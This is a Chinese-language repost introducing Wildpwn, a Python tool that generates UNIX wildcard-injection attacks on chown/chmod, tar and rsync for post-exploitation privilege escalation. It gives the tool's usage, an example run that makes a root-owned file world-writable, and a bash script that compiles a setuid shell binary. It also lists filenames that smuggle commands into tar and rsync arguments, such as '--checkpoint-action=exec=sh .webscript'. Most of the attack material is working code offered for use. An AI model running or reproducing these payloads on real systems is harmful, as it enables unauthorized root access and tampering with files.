内容简介:在介绍工具之前,建议大家先阅读下这篇介绍UNIX通配符的文档:combined:
Wildpwn 是一个 Python 编写的UNIX通配符攻击工具。UNIX通配符攻击是一种较早之前的黑客技术,但时至今日仍有其用武之地。在一些后渗透场景中,我们可以利用通配符来劫持文件所有者,执行任意命令,提升权限等。
在介绍 工具 之前,建议大家先阅读下这篇介绍UNIX通配符的文档: https://www.exploit-db.com/papers/33930/
基本使用
usage: wildpwn.py [-h] [--file FILE] payload folder Tool to generate unix wildcard attacks positional arguments: payload 要使用的payload: (combined | tar | rsync) folder 要写入payloads的位置 optional arguments: -h, --help 显示帮助信息并退出 --file FILE 获取所有/更改权限的文件路径。该参数只支持combined攻击
Payload 类型
combined: 使用chown & chmod 文件相关技巧,具体请参阅文档的4.1 和 4.2部分。
tar: 使用Tar任意命令执行技巧,具体请参阅文档的4.3部分。
rsync:使用Rsync任意命令执行技巧,具体请参阅文档的4.4部分。
使用示例:
$ ls -lh /tmp/very_secret_file -rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file $ ls -lh ./pwn_me/ drwxrwxrwx 2 root root 4,0K jun 28 21:38 . [...] -rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1 -rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2 [...] $ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/ [!] Selected payload: combined [+] Done! Now wait for something like: chown uid:gid * (or) chmod [perms] * on ./pwn_me/. Good luck! [...time passes / some cron gets executed...] # chmod 000 * (for example) [...back with the unprivileged user...] $ ls -lha ./pwn_me/ [...] -rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1 -rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2 [...] $ ls -lha /tmp/very_secret_file -rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file
用于tar/rsync攻击的Bash脚本
#!/bin/sh
# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"
# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF
# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache
# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile
Clean up (tar)
# clean up rm -rf ./'--checkpoint=1' rm -rf ./'--checkpoint-action=exec=sh .webscript' rm -rf .webscript rm -rf .cachefile.c
Clean up (rsync)
# clean up rm -rf ./'-e sh .syncscript' rm -rf .syncscript rm -rf .cachefile.c
*参考来源: kitploit ,FB小编 secist 编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- PowerShell转义通配符
- LeetCode44.通配符匹配 JavaScript
- Java 泛型之上界下界通配符
- 004-零失败快速搞定通配符SSL证书
- PHP源码调试之Windows文件通配符分析
- 正则表达式 – Morphia mongoDB通配符查询
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Clean Architecture
Robert C. Martin / Prentice Hall / 2017-9-20 / USD 34.99
Practical Software Architecture Solutions from the Legendary Robert C. Martin (“Uncle Bob”) By applying universal rules of software architecture, you can dramatically improve developer producti......一起来看看 《Clean Architecture》 这本书的介绍吧!
